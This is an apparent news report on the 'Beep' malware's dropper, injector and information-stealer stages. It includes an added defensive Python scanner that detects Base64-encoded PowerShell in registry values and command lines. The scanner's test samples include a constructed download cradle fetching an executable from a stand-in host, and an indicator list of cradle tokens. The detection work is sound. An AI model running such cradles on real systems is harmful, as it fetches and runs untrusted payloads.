Cybersecurity researchers have unearthed a new piece of evasive malware dubbed Beep that’s designed to fly under the radar and drop additional payloads onto a compromised host.
“It seemed as if the authors of this malware were trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find,” Minerva Labs researcher Natalie Zargarov said.
“One such technique involved delaying execution through the use of the Beep API function, hence the malware’s name.”
Beep comprises three components, the first of which is a dropper that’s responsible for creating a new Windows Registry key and executing a Base64-encoded PowerShell script stored in it.
The PowerShell script, for its part, reaches out to a remote server to retrieve an injector, which, after confirming it’s not being debugged or launched in a virtual machine, extracts and launches the payload via a technique called process hollowing.
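The dropper stage described above (a Base64-encoded PowerShell script parked in a registry value and later executed) is something a defender can hunt for directly. The following is an added example, not code from the article or from Minerva Labs: a small Python scanner that takes (source, data) pairs as they might come from a registry or process-command-line collection, finds long Base64 runs, decodes them as UTF-16LE (the encoding `powershell -EncodedCommand` expects) or UTF-8, and flags decoded scripts that contain download-and-run indicators. All sample values, registry paths, the `example.invalid` host and the indicator list are constructed for the example and are not Beep artefacts.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field

# Indicators of a download-and-run cradle in decoded PowerShell text.
# Illustrative list, not a complete signature set.
CRADLE_TOKENS = (
    "Invoke-WebRequest", "DownloadString", "DownloadFile", "Net.WebClient",
    "Invoke-Expression", "IEX", "Start-Process", "FromBase64String",
)
# A Base64 run long enough to be a script rather than a short identifier.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


@dataclass
class Finding:
    source: str                                # registry value or command line it came from
    decoded: str                               # recovered PowerShell text
    indicators: list = field(default_factory=list)


def _looks_like_text(s: str) -> bool:
    """Mostly-ASCII printable text; rejects binary that happened to decode."""
    if not s:
        return False
    ascii_share = sum(ch < "\x80" for ch in s) / len(s)
    printable = all(ch.isprintable() or ch in "\r\n\t" for ch in s)
    return ascii_share >= 0.95 and printable


def decode_candidate(blob: str):
    """Return the script if `blob` is Base64 of UTF-16LE or UTF-8 text, else None.
    UTF-16LE is tried first because that is what -EncodedCommand uses."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return None
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if _looks_like_text(text):
            return text
    return None


def scan_values(values):
    """values: iterable of (source, data) pairs. Returns a Finding for every
    Base64 run that decodes to PowerShell containing cradle indicators."""
    findings = []
    for source, data in values:
        for match in B64_RUN.finditer(data):
            text = decode_candidate(match.group(0))
            if text is None:
                continue
            # Whole-token match so e.g. "IEX" does not fire inside other words.
            hits = [t for t in CRADLE_TOKENS
                    if re.search(r"(?<![\w-])" + re.escape(t) + r"(?![\w-])",
                                 text, re.IGNORECASE)]
            if hits:
                findings.append(Finding(source, text, hits))
    return findings


# Constructed samples standing in for the output of a registry / command-line
# collection. Encoded here so the example is self-contained; not real artefacts.
_SCRIPT = "Invoke-WebRequest 'http://example.invalid/stage2' -OutFile $env:TEMP\\s2.exe"
SAMPLE_VALUES = [
    # dropper-style: script stored as UTF-8 Base64 in a registry value
    ("HKCU\\Software\\Example\\Loader", base64.b64encode(_SCRIPT.encode()).decode()),
    # launcher-style: -EncodedCommand carries UTF-16LE Base64
    ("cmdline:pid 4242", "powershell.exe -NoProfile -EncodedCommand "
        + base64.b64encode(_SCRIPT.encode("utf-16-le")).decode()),
    # benign Run value: no long Base64 run at all
    ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     '"C:\\Program Files\\Vendor\\Updater.exe" /background'),
    # Base64 of binary bytes: decodes, but fails the text check
    ("HKCU\\Software\\Example\\Blob", base64.b64encode(bytes(range(48))).decode()),
]

if __name__ == "__main__":
    for f in scan_values(SAMPLE_VALUES):
        print(f"{f.source}: {f.indicators} -> {f.decoded}")
```

Run on the constructed samples, only the two PowerShell-carrying entries are reported; the benign Run value and the binary blob produce nothing. In a real deployment the `values` iterable would be fed from Run/RunOnce keys, scheduled-task actions and process-creation logs, and the indicator list tuned to the environment.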
The payload is an information stealer that’s equipped to collect and exfiltrate system information and enumerate running processes. Other instructions the malware is capable of accepting from a command-and-control (C2) server include the ability to execute DLL and EXE files.